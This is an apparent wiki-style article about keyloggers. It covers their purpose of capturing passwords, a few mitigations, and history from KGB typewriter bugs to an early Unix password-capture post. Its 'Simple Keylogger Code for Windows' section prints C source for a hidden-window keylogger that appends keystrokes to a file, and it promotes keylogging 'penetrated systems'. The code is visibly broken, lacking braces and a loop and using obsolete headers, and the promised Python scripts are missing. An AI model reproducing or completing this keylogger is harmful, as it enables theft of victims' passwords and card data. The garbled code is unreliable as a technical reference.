The Linux Key Logger's Help Screen
Also known as a keystroke logger or keyboard capture, a keylogger is a piece of software that allows an attacker to record every stroke of a keyboard. The data can be made human readable through some formatting, but ultimately the primary purpose is the capturing of passwords and other sensitive data, as attempting to make sense of keystrokes in real time is not an easy task for a human -- there are many non-letter strokes entered, such as space and delete.


There are many ways to mitigate a keylogger or potential keylogger. One method is to utilize a software keyboard when entering sensitive data such as passwords of credit card numbers. Anti-viruses do not detect all keyloggers, especially those that run as System or with root privileges.

Simple Keylogger Code for Windows

The following keylogger code will work on many older Windows systems, though may not function properly on a Windows 10 box.

# include <stdio.h>
# include <conio.h>
# include <windows.h>
# include <winuser.h>
# include <iostream.h>

int main ( void )
int cha;
char ch;
FILE *fptr;
HWND stealth; /*creating stealth (window is not visible)*/
if ( kbhit() )
ch = getch();
cha = ch;
fptr = fopen("KEYS.TXT", "a+");
if ( cha == 27 )
return 0;

Keylogger Scripts


The following are written in Python and relatively cross-platform. Of course, they require that Python is installed on a given system.


Most of the web runs on Linux servers. Penetrated systems can be potentially keylogged with the following software.




During the 1970s, KGB agents developed a method of recording the keystrokes of typewriters at US embassies in Russia. They were only able to capture 8 characters at a time and transmitted the data remotely to waiting receivers via radio, which required batteries to be periodically replaced.

In the early 1980s, Perry S. Kivolowitz submitted code to the Unix users mailing list outlining a method of capturing Unix user passwords via keylogging. He did not consider his innovation to be novel, saying:

I am not claiming it is a new idea and, actually, I send the following only at the prodding of some friends. [...] The bottom line: ANY USER CAN STEAL ANYONE'S PASSWORD by simply listening to the terminal as another user logs in.

His entire message, including the code, is archived here.

Article info

Categories: Tools